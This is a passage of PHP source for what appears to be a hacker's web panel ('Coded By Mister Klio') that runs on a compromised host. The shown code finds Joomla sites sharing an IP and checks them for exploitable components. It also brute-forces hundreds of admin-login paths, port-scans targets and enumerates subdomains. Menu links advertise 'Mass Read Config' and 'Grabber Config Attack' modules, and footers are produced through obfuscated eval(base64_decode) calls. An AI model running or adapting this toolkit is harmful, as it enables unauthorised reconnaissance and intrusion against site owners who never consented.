  3000.      
  3001.     $arz=array_merge($f2[1],$f[1],$f3[1]);
  3002.      
  3003.     $coms=array();
  3004.      
  3005.     foreach(array_unique($arz) as $x){
  3006.     $coms[]=$x;
  3007.     }
  3008.      
  3009.     foreach($coms as $comm){
  3010.      
  3011.     echo "<tr><td>$comm</td>";
  3012.     check_exploit($comm);
  3013.     }
  3014.      
  3015.     }
  3016.      
  3017.     function sec($site){
  3018.     preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
  3019.     if(eregi("www",$sites[0][0])){
  3020.     return $site=str_replace("index.php","",$sites[0][0]);
  3021.     }else{
  3022.     return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
  3023.     }}
  3024.      
  3025.     $npages = 50000;
  3026.      
  3027.     if ($_POST)
  3028.     {
  3029.       $ip = trim(strip_tags($_POST['site']));
  3030.       $npage = 1;
  3031.       $allLinks = array();
  3032.      
  3033.      
  3034.        while($npage <= $npages)
  3035.       {
  3036.      
  3037.       $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
  3038.      
  3039.      
  3040.         if ($x)
  3041.         {
  3042.             preg_match_all('(<div>.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $x, $findlink);
  3043.            
  3044.             foreach ($findlink[1] as $fl)
  3045.            
  3046.             $allLinks[]=sec($fl);
  3047.            
  3048.            
  3049.             $npage = $npage + 10;
  3050.            
  3051.             if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
  3052.                 break;              
  3053.         }
  3054.        
  3055.         else
  3056.             break;
  3057.       }
  3058.      
  3059.      
  3060.     $allDmns = array();
  3061.      
  3062.     foreach ($allLinks as $kk => $vv){
  3063.      
  3064.     $allDmns[] = $vv;
  3065.     }
  3066.                
  3067.     echo'<table border="0"  style="width:50%;" >
  3068.    <tr><td width=\"30%\"><b>SERVER IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>            
  3069.    <tr><td style="width:50%;"><b>SITES FOUND &nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  3070.    </table>';
  3071.     echo "<br><br>";
  3072.      
  3073.     echo'<table border="0" align=\"center\" style="width:50%;">';
  3074.      
  3075.     foreach(array_unique($allDmns) as $h3h3){
  3076.      
  3077.     echo'<tr><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>EXPLOIT-DB</b></td><td><b>CHALLENGE OF EXPLOITING ..!</b></td></tr>';
  3078.      
  3079.     check_com($h3h3);
  3080.      
  3081.     }
  3082.      
  3083.     echo"</table>";
  3084. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3085. echo ''. $FOTTER2 .'' ;
  3086. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3087. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3088. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3089. $SERVERIP1 = "SERVER IP :";
  3090. echo ''. $SERVERIP1 .'' ;
  3091. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3092. $SPAN3 = "</span>";
  3093. echo ''. $SPAN2 .'' ;
  3094. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3095. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3096. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3097. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3098. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3099. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3100. $HOSTOWNED1 = "HOST OWNED :";
  3101. echo ''. $HOSTOWNED1 .'' ;
  3102. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3103. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3104. echo ''. $REPORTERROR .'</a></span></footer>';
  3105. echo ''. $THEEND .'' ;}
  3106. exit;}
  3107. ////// FINDERADMIN
  3108. if ($_GET['Mister'] == 'FinderAdmin') {
  3109. $FOTTER2 = "<footer class='MK-footer'>";  
  3110. echo ''. $FOTTER2 .'' ;
  3111. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3112. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3113. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3114. $SERVERIP1 = "SERVER IP :";
  3115. echo ''. $SERVERIP1 .'' ;
  3116. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3117. $SPAN3 = "</span>";
  3118. echo ''. $SPAN2 .'' ;
  3119. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3120. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3121. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3122. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3123. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3124. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3125. $HOSTOWNED1 = "HOST OWNED :";
  3126. echo ''. $HOSTOWNED1 .'' ;
  3127. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3128.  
  3129.  
  3130. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3131. echo ''. $REPORTERROR .'</a></span></footer>';
  3132. echo ''. $THEEND .'' ;
  3133. ////// FOOTER
  3134. echo "<br><center><nav class='social'><ul>
  3135. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3136. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3137. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3138. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3139. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3140. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3141. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3142. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3143. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3144. <li><a href='?Mister=whois'>Website Whois</a></li>
  3145. </ul></nav></center>";
  3146. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>FIND ADMINISTRATOR PANEL V1.0</span></nav><br><div class=content><center>";
  3147. ?>
  3148. <form action ="" method="post">
  3149. <span style="color:white"><center>Coded By Mister Klio</center></span>
  3150. <span style="color:white"><center>URL : HTTP://TARGET.COM</center></span><br>
  3151. <center><input type="text" name="site" class="input" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%" ><br><br>
  3152. <input type = "submit" value="FIND" class="Mister-button" ></center>
  3153. </form></td>
  3154. <?php
  3155. $site = $_POST['site'];
  3156. $list = array(
  3157. '/administrator/',
  3158. '/administrateur/',
  3159. '/admin/',
  3160. '/login.php/',
  3161. '/adm/',
  3162. '/admin/',
  3163. '/admin/account.php/',
  3164. '/admin/login.php/',
  3165. '/admin/home/',
  3166. '/admin/controlpanel.php/',
  3167. '/admin/controlpanel.html/',
  3168. '/admin/cp/',
  3169. '/admin/adminLogin.php/',
  3170. '/admin/adminLogin.html/',
  3171. '/admin/admin_login/',
  3172. '/admin/controlpanel/',
  3173. '/admin/admin-login/',
  3174. '/admin-login/',
  3175. '/admin/account/',
  3176. '/admin/admin/',
  3177. '/admin.html/',
  3178. '/admin.php/',
  3179. '/adminitem/',
  3180. '/adminitems/',
  3181. '/administrator/',
  3182. '/administrator/login/',
  3183. '/administrator/',
  3184. '/administration/',
  3185. '/adminlogin/',
  3186. '/admin_area/admin/',
  3187. '/admin_area/',
  3188. '/admin_area/login/',
  3189. '/manager/',
  3190. '/letmein/',
  3191. '/superuser/',
  3192. '/access/',
  3193. '/sysadm/',
  3194. '/superman/',
  3195. '/supervisor/',
  3196. '/panel/',
  3197. '/control/',
  3198. '/member/',
  3199. '/members/',
  3200. '/user/',
  3201. '/cp/',
  3202. '/uvpanel/',
  3203. '/manage/',
  3204. '/management/',
  3205. '/signin/',
  3206. '/log-in/',
  3207. '/sign-in/',
  3208. '/users/',
  3209. '/accounts/',
  3210. '/wp-login.php/',
  3211. '/bb-admin/login/',
  3212. '/bb-admin/admin/',
  3213. '/bb-admin/admin.php/',
  3214. '/administrator/account/',
  3215. '/relogin.htm/',
  3216. '/relogin.php/',
  3217. '/check/',
  3218. '/relogin/',
  3219. '/blog/wp-login/',
  3220. '/user/admin/',
  3221. '/users/admin/',
  3222. '/registration/',
  3223. '/processlogin/',
  3224. '/checklogin/',
  3225. '/checkuser/',
  3226. '/checkadmin/',
  3227. '/isadmin/',
  3228. '/authenticate/',
  3229. '/authentication/',
  3230. '/auth/',
  3231. '/authuser/',
  3232. '/authadmin/',
  3233. '/modelsearch/login/',
  3234. '/moderator/',
  3235. '/controlpanel//',
  3236. '/admincontrol/',
  3237. '/adminpanel/',
  3238. '/fileadmin/',
  3239. '/sysadmin/',
  3240. '/admin1/',
  3241. '/admin1.php/',
  3242. '/admin2/',
  3243. '/admin2.php/',
  3244. '/yonetim/',
  3245. '/yonetim.php/',
  3246. '/yonetici/',
  3247. '/yonetici.php/',
  3248. '/myadmin/',
  3249. '/ur-admin/',
  3250. '/Server/',
  3251. '/wp-admin/',
  3252. '/administr8/',
  3253. '/webadmin/',
  3254. '/administratie/',
  3255. '/admins/',
  3256. '/administrivia/',
  3257. '/Database_Administration/',
  3258. '/useradmin/',
  3259. '/sysadmins/',
  3260. '/admin1/',
  3261. '/system-administration/',
  3262. '/administrators/',
  3263. '/pgadmin/',
  3264. '/DIRectadmin/',
  3265. '/staradmin/',
  3266. '/ServerAdministrator/',
  3267. '/SysAdmin/',
  3268. '/administer/',
  3269. '/LiveUser_Admin/',
  3270. '/sys-admin/',
  3271. '/typo3/',
  3272. '/panel/',
  3273. '/cpanel/',
  3274. '/cpanel_file/',
  3275. '/platz_login/',
  3276. '/rcLogin/',
  3277. '/blogindex/',
  3278. '/formslogin/',
  3279. '/autologin/',
  3280. '/support_login/',
  3281. '/meta_login/',
  3282. '/manuallogin/',
  3283. '/simpleLogin/',
  3284. '/loginflat/',
  3285. '/utility_login/',
  3286. '/showlogin/',
  3287. '/memlogin/',
  3288. '/login-reDIRect/',
  3289. '/sub-login/',
  3290. '/wp-login/',
  3291. '/login1/',
  3292. '/DIR-login/',
  3293. '/login_db/',
  3294. '/xlogin/',
  3295. '/smblogin/',
  3296. '/customer_login/',
  3297. '/UserLogin/',
  3298. '/login-us/',
  3299. '/acct_login/',
  3300. '/bigadmin/',
  3301. '/project-admins/',
  3302. '/phppgadmin/',
  3303. '/pureadmin/',
  3304. '/sql-admin/',
  3305. '/radmind/',
  3306. '/openvpnadmin/',
  3307. '/wizmysqladmin/',
  3308. '/vadmind/',
  3309. '/ezsqliteadmin/',
  3310. '/hpwebjetadmin/',
  3311. '/newsadmin/',
  3312. '/adminpro/',
  3313. '/Lotus_Domino_Admin/',
  3314. '/bbadmin/',
  3315. '/vmailadmin/',
  3316. '/Indy_admin/',
  3317. '/ccp14admin/',
  3318. '/irc-macadmin/',
  3319. '/banneradmin/',
  3320. '/sshadmin/',
  3321. '/phpldapadmin/',
  3322. '/macadmin/',
  3323. '/administratoraccounts/',
  3324. '/admin4_account/',
  3325. '/admin4_colon/',
  3326. '/radmind-1/',
  3327. '/Super-Admin/',
  3328. '/AdminTools/',
  3329. '/cmsadmin/',
  3330. '/SysAdmin2/',
  3331. '/globes_admin/',
  3332. '/cadmins/',
  3333. '/phpSQLiteAdmin/',
  3334. '/navSiteAdmin/',
  3335. '/server_admin_small/',
  3336. '/logo_sysadmin/',
  3337. '/power_user/',
  3338. '/system_administration/',
  3339. '/ss_vms_admin_sm/',
  3340. '/bb-admin/',
  3341. '/panel-administracion/',
  3342. '/instadmin/',
  3343. '/memberadmin/',
  3344. '/administratorlogin/',
  3345. '/adm/',
  3346. '/admin_login/',
  3347. '/panel-administracion/login/',
  3348. '/pages/admin/admin-login/',
  3349. '/pages/admin/',
  3350. '/acceso/',
  3351. '/admincp/login/',
  3352. '/admincp/',
  3353. '/adminarea/',
  3354. '/admincontrol/',
  3355. '/affiliate/',
  3356. '/adm_auth/',
  3357. '/memberadmin/',
  3358. '/administratorlogin/',
  3359. '/modules/admin/',
  3360. '/administrators/',
  3361. '/siteadmin/',
  3362. '/adminsite/',
  3363. '/kpanel/',
  3364. '/vorod/',
  3365. '/adminpanel/',
  3366. '/PSUser/',
  3367. '/secure/',
  3368. '/webmaster/',
  3369. '/autologin/',
  3370. '/userlogin/',
  3371. '/admin_area/',
  3372. '/cmsadmin/',
  3373. '/security/',
  3374. '/usr/',
  3375. '/root/',
  3376. '/secret/',
  3377. '/admin/login/',
  3378. '/admin/adminLogin/',
  3379. '/moderator.php/',
  3380. '/moderator/login/',
  3381. '/moderator/admin/',
  3382. '/yonetici/',
  3383. '/admin/',
  3384. '/manager/',
  3385. '/aadmin/',
  3386. '/cgi-bin/login/',
  3387. '/login1/',
  3388. '/login_admin/',
  3389. '/login_out/',
  3390. '/login_user/',
  3391. '/loginerror/',
  3392. '/loginok/',
  3393. '/loginsave/',
  3394. '/loginsuper/',
  3395. '/login/',
  3396. '/logout/',
  3397. '/secrets/',
  3398. '/super1/',
  3399. '/super_index/',
  3400. '/super_login/',
  3401. '/supermanager/',
  3402. '/superman/',
  3403. '/superuser/',
  3404. '/supervise/',
  3405. '/supervise/Login/',
  3406. '/super/',
  3407. '/p/m/a/',
  3408. '/dev/',
  3409. '/webadmin/',
  3410. '/sqlweb/',
  3411. '/websql/',
  3412. '/webdb/',
  3413. '/mya/',
  3414. '/myadmin/',
  3415. '/server/',
  3416. '/db/',
  3417. '/configuration/',
  3418. '/configure/',
  3419. '/administrator/',
  3420. '/moderator/',
  3421. '/controlpanel/',
  3422. '/adminpanel/',
  3423. '/admincontrol/',
  3424. '/fileadmin/',
  3425. '/data/',
  3426. '/postgresql/',
  3427. '/oracle/',
  3428. '/msssql/',
  3429. '/msaccess/',
  3430. '/sysadmin/',
  3431. '/serverdata/',
  3432. '/admins/',
  3433. '/Database_Administration/',
  3434. '/useradmin/',
  3435. '/sysadmins/',
  3436. '/admin1/',
  3437. '/system-administration/',
  3438. '/administrators/',
  3439. '/pgadmin/',
  3440. '/DIRectadmin/',
  3441. '/staradmin/',
  3442. '/ServerAdministrator/',
  3443. '/SysAdmin/',
  3444. '/LiveUser_Admin/',
  3445. '/sys-admin/',
  3446. '/typo3/',
  3447. '/panel/',
  3448. '/xlogin/',
  3449. );
  3450. if(isset($site)){
  3451. foreach($list as $path => $test) {
  3452. $Inject = curl_init();
  3453. curl_setopt($Inject, CURLOPT_RETURNTRANSFER, 1);
  3454. curl_setopt($Inject, CURLOPT_HEADER, 1);
  3455. curl_setopt($Inject, CURLOPT_URL, $site.$test);
  3456. $result = curl_exec($Inject);
  3457. curl_close($Inject);
  3458. //print $url;
  3459. if (preg_match("/200 OK/", $result)){
  3460. echo "<br>[<b><span style='color:#0078FF'>&check;</span></b> DONE! : </span><a target=_white ><span style='color:red'>$site$test </span>]</span>";
  3461. }
  3462. else       if (preg_match("/401 Unauthorized/", $result)) {
  3463. echo "<br>[<b><span style='color:#0078FF'>&check;</span></b>
  3464. DONE! : </span><<a target=_white href='$site$test'>$site$test </a></span></span>";
  3465. }
  3466. }
  3467. echo "<center><br><b><span style='color:#0078FF'>&check; SCAN FINISHED </span></b></center><br>";
  3468. }
  3469. exit;
  3470. }
  3471. if ($_GET['Mister'] == 'whois') {
  3472. echo '<br><center><nav class="social"><ul>
  3473. <li><a href="?Mister=FinderAdmin">Finder Administer Panel V1.0</a></li>
  3474. <li><a href="?Mister=Domains">Get All Domains</a></li>
  3475. <li><a href="?Mister=Finder">Finder Database Panel</a></li>
  3476. <li><a href="?Mister=Getip">Get Ip 2 Domains </a></li>
  3477. <li><a href="?Mister=subdomain">Subdomain Checker</a></li>
  3478. <li><a href="?Mister=iplookdom">Ip Lookup Reverse</a></li>
  3479. <li><a href="?Mister=Rev">Mass Read Config </a></li>
  3480. <li><a href="?Mister=Grabber">Grabber Config Attack</a></li>
  3481. <li><a href="?Mister=J-Scann3r">Joomla Serv3r Scann3r</a></li>
  3482. <li><a href="?Mister=whois">Website Whois</a></li>
  3483. </ul></nav></center>
  3484. ';
  3485. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF;'>WEBSITE WHOIS</span></nav><center><br><div class='content'>";
  3486. @set_time_limit(0);
  3487.    @error_reporting(0);
  3488.    function sws_domain_info($site)
  3489.    {
  3490.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  3491.    flush();
  3492.    $ip = @findit($getip,'<pre>','</pre>');
  3493.    return $ip;
  3494.    flush();
  3495.    }
  3496.    function sws_net_info($site)
  3497.    {
  3498.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  3499.    $ip = @findit($getip,'<pre>','</pre>');
  3500.    return $ip;
  3501.    flush();
  3502.    }
  3503.    function sws_site_ser($site)
  3504.    {
  3505.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  3506.    $ip = @findit($getip,'<pre>','</pre>');
  3507.    return $ip;
  3508.    flush();
  3509.    }
  3510.    function sws_sup_dom($site)
  3511.    {
  3512.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  3513.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  3514.    return $ip;
  3515.    flush();
  3516.    }
  3517.    function sws_port_scan($ip)
  3518.    {
  3519.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  3520.    foreach ($list_post as $o_port)
  3521.    {
  3522.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  3523.    if($connect)
  3524.    {
  3525.    echo " $ip : $o_port ??? <u style=\"color: #0078FF\">OPEN</u> <br>";
  3526.    flush();
  3527.    }
  3528.    }
  3529.    }
  3530.    function findit($mytext,$starttag,$endtag) {
  3531.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  3532.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  3533.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  3534.    flush();
  3535.    }
  3536.    ?>
  3537. <center>
  3538. <br>
  3539. <form method="post"><table>
  3540.     <tr><td>SITE TO SCAN </td><td>:</td><td><input type="text" name="site" size="50" style="color:#0078FF;background-color:#000000" class="inputz" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" /> <br><input class="Mister-button" type="submit" name="scan" value="SCAN !" />
  3541. </table></form>
  3542. <?php
  3543.    if(isset($_POST['scan']))
  3544.    {
  3545.    $site = @htmlentities($_POST['site']);
  3546.    if (empty($site)){die('<br style="color:red;"> NOT ADD IP...... !');}
  3547.    $ip_port = @gethostbyname($site);
  3548.    echo "
  3549.   <br style='color:#FFFFFF;'> SCANNING [ $site IP $ip_port ] ...
  3550.   <br>|-------------- PORT SERVER ------------------| <br>";
  3551.    echo "<pre style='color:#0078FF;'>".sws_port_scan($ip_port)." </pre> ";
  3552.    flush();
  3553.    echo "<br>|-------------- DOMAIN INFO ------------------| <br>
  3554.   <pre style='color:#0078FF;'>".sws_domain_info($site)."</pre>";
  3555.    flush();
  3556.    echo "
  3557.    <br>|-------------- NETWORK INFO ------------------| <br />
  3558.   <pre style='color:#0078FF;'>".sws_net_info($site)."</pre> ";
  3559.    flush();
  3560.    echo "<br>|-------------- SUBDOMAINS SERVER ------------------| <br />
  3561.   <pre style='color:#0078FF;'>".sws_sup_dom($site)."</pre> ";
  3562.    flush();
  3563.    echo "<br>|-------------- SITE SERVER ------------------| <br />
  3564.   <pre style='color:#0078FF;'>".sws_site_ser($site)."</pre>
  3565.    <br> |-------------- END ------------------| <br />";
  3566.    flush();
  3567.    }
  3568.    echo '</center>';
  3569.  
  3570. $FOTTER2 = "<footer class='MK-footer'>";  
  3571. echo ''. $FOTTER2 .'' ;
  3572. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3573. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3574. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3575. $SERVERIP1 = "SERVER IP :";
  3576. echo ''. $SERVERIP1 .'' ;
  3577. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3578. $SPAN3 = "</span>";
  3579. echo ''. $SPAN2 .'' ;
  3580. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3581. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3582. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3583. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3584. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3585. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3586. $HOSTOWNED1 = "HOST OWNED :";
  3587. echo ''. $HOSTOWNED1 .'' ;
  3588. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3589. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3590. echo ''. $REPORTERROR .'</a></span></footer>';
  3591. echo ''. $THEEND .'' ;
  3592. exit;
  3593. }
  3594. //////////// GETIP
  3595. if ($_GET['Mister'] == 'Getip') {
  3596. echo "<br><center><nav class='social'><ul>
  3597. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3598. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3599. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3600. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3601. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3602. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3603. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3604. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3605. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3606. <li><a href='?Mister=whois'>Website Whois</a></li>
  3607. </ul></nav></center>";
  3608. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>GET DOMAINS 2 IP</span></nav><br><center>";
  3609. ?>
  3610. <table align='center' width='50%' ></td><td><form method='post' ><br>
  3611. <span style='color:white'><center>LISTE URL :</span><center>
  3612. <textarea cols='50' rows='12' name='site2ip' class='input' style='height:100px;'><?php echo "".$_SERVER['HTTP_HOST']."";?> </textarea></br><br>
  3613. <input type='submit' value='EXTRACT' name='w2ip' class='Mister-button'>
  3614. <br></center></table></table></center>
  3615. <?php
  3616. if(isset($_POST['site2ip'])){
  3617. foreach(explode("\n",$_POST['site2ip']) as $site4ip){
  3618. $ipp=trim($site4ip);
  3619. echo '<br><center>
  3620. <span style="color:#FFFFFF">NAME HOST : </span>'.$ipp.'
  3621. <br><span style="color:#FFFFFF">  IP HOST : </span>'.gethostbyname ($ipp).'</center><br>';
  3622. }
  3623. }
  3624. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3625. echo ''. $FOTTER2 .'' ;
  3626. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3627. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3628. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3629. $SERVERIP1 = "SERVER IP :";
  3630. echo ''. $SERVERIP1 .'' ;
  3631. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3632. $SPAN3 = "</span>";
  3633. echo ''. $SPAN2 .'' ;
  3634. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3635. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3636. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3637. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3638. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3639. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3640. $HOSTOWNED1 = "HOST OWNED :";
  3641. echo ''. $HOSTOWNED1 .'' ;
  3642. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3643. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3644. echo ''. $REPORTERROR .'</a></span></footer>';
  3645. echo ''. $THEEND .'' ;
  3646. exit;}
  3647. //////////// SUBDOMAIN
  3648. if ($_GET['Mister'] == 'subdomain'){
  3649. echo "<br><center><nav class='social'><ul>
  3650. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3651. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3652. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3653. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3654. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3655. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3656. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3657. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3658. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3659. <li><a href='?Mister=whois'>Website Whois</a></li>
  3660. </ul></nav></center>";
  3661. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>SUBDOMAIN CHECKER</span></nav><center>";
  3662. ?>
  3663. <br><form method="post">
  3664. <span style="font-size:9px;color:#FFFFFF;"><center>URL :</center></span>
  3665. <input type="text" name="site" size="30" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%" class="input"><br><br>
  3666. <input name="submit"  type="submit" value="SUBMIT" class="Mister-button"><br><br>
  3667. </form>
  3668. </font>
  3669. <?php
  3670. set_time_limit(0);
  3671. $subs = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","lan","phpmyadmin","administrator","mape","isp","shop","rex","podcast","potraga","sensation","igre","foo","api","access","ulaz","pam","sport","pretraga","pricaonica","kuvar","raketa","wwwmobile","s1","s2","foro","s3","box","open","abc","phpbb3","phpbb2","internet","phpbb","whm","mysql","webadmin","adm","admin","admins","agent","aix","recnik","alerts","av","antivirus","app","apps","appserver","archive","as400","auto","backup","banking","bbdd","bbs","bea","beta","blog","catalog","cgi","channel","channels","chat","cisco","client","clients","club","cluster","clusters","code","commerce","community","compaq","conole","consumer","contact","contracts","corporate","ceo","cso","cust","customer","cpanel","data","bd","db2","default","demo","cms","design","desktop","dev","develop","developer","device","dial","digital","DIR","DIRectory","disc","discovery","disk","dns","dns1","dns2","dns3","docs","poslovi","prijemni","znanje","mojtim","documents","domain","domains","dominoweb","download","downloads","ecommerce","e-commerce","edi","edu","education","email","enable","engine","engineer","enterprise","slike","galerija","error","event","events","example","exchange","extern","external","extranet","fax","field","finance","firewall","forum","forums","fsp","ftp","ftp2","fw","fw1","gallery","galleries","games","gateway","gopher","guest","gw","hello","helloworld","help","helpdesk","arkiva","lajme","faqe","helponline","hp","ibm","ibmdb","ids","ILMI","film","navigator","nalog","prodavnica","zdravlje","reklamiranje","zivot","images","imap","pomoc","imap4","img","imgs","info","intern","internal","intranet","invalid","iphone","ipsec","irc","ircserver","jobs","ldap","link","linux","lists","listserver","local","localhost","log","logs","login","lotus","mail","mailboxes","mailhost","result","management","manage","manager","map","maps","marketing","device","media","member","members","messenger","mngt","mobile","monitor","multimedia","music","my","names","lojra","albania","bisedo","puka","foto","emra","njohje","vip","egea-tirana","historia","forumi","vesti","administracija","net","new1","new","perkohesisht","netdata","netstats","network","news","nms","nntp","ns","ns1","ns2","ns3","ntp","online","openview","oracle","outlook","page","pages","partner","partners","pda","personal","ph","pictures","pix","pop","pop3","portal","p